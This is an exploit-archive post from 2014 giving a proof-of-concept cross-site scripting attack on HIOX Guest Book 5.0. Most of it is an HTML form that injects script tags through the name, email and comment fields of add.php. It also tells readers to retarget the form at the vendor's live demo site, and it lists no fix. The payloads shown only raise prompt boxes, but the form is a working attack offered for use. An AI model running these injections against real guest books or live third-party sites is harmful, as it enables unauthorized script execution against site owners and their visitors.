HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting

2014-01-03 18:42:20
Posted by: JoKeR_StEx

#############################################################################

# Exploit Title : HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting

# Author : JoKeR_StEx

# Tested On : Windows

# Download Software Link : http://www.hscripts.com/scripts/php/guest-book.php

# Date : 03/01/2014

#############################################################################
[+] P.O.C

<form action="http://127.0.0.1/HGB/add.php" method="POST">
<!--In Name -->
<input type="hidden" name="name1" value=""><script>prompt('JoKeR_StEx')</script>">
<!-- In Email -->
<input type="hidden" name="email" value=""><script>prompt('xss (email)')</script>">
<!-- in comment -->
<input type="hidden" name="cmt" value=""><script>prompt('xss (comment)')</script>">
</form>

[+] For test The Exploit (Example)

ex:http://www.hscripts.com/scripts/php/HGB/index.php

Just Replace http://127.0.0.1/HGB/add.php by http://www.hscripts.com/scripts/php/HGB/index.php ^___^

################################################################################
# Gr33t'z To : Asesino04 , Shield Dz , & All My Friends & All Algerians
################################################################################
email : [email protected]
Facebook : fb.me/imadlilong.lasvegas
twitter : @JoKeR_StEx

Fixes

No fixes

In order to submit a new fix you need to be registered.